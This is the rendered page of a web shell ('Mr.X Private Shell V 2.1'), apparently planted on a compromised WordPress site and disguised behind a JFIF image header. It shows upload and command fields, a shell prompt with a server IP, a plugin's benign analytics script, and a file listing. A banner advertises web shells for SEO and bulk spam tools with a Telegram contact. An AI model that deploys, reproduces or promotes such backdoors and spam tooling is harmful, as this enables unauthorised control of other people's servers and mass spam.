����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

fistvdlb@216.73.217.65: ~ $
import { INSIGHTS_HOST } from '@constants';
import { reqDataBasics } from '@shared/lib/data';

const HEADERS = {
	'Content-type': 'application/json',
	Accept: 'application/json',
	'X-Extendify': 'true',
};

const ENDPOINT = `${INSIGHTS_HOST}/api/v1/event`;

export const track = (key, payload = {}) => {
	if (!INSIGHTS_HOST || !key) return;
	const { siteId, partnerId, homeUrl, siteCreatedAt } = reqDataBasics;
	try {
		fetch(ENDPOINT, {
			method: 'POST',
			headers: HEADERS,
			keepalive: true,
			body: JSON.stringify({
				insightsId: siteId,
				key,
				payload,
				partnerId,
				siteURL: homeUrl,
				siteCreatedAt,
			}),
		}).catch(() => {
			/* swallow */
		});
	} catch (_e) {
		/* swallow */
	}
};

Filemanager

Name Type Size Permission Actions
api-fetch.js File 346 B 0644
data.js File 341 B 0644
dom.js File 254 B 0644
embedded-guard.js File 669 B 0644
media-views.js File 1.97 KB 0644
pages.js File 16.27 KB 0644
parsing.js File 206 B 0644
track.js File 713 B 0644
unsplash.js File 1.93 KB 0644
utils.js File 1.72 KB 0644
variant-classes.js File 4.72 KB 0644
wp.js File 499 B 0644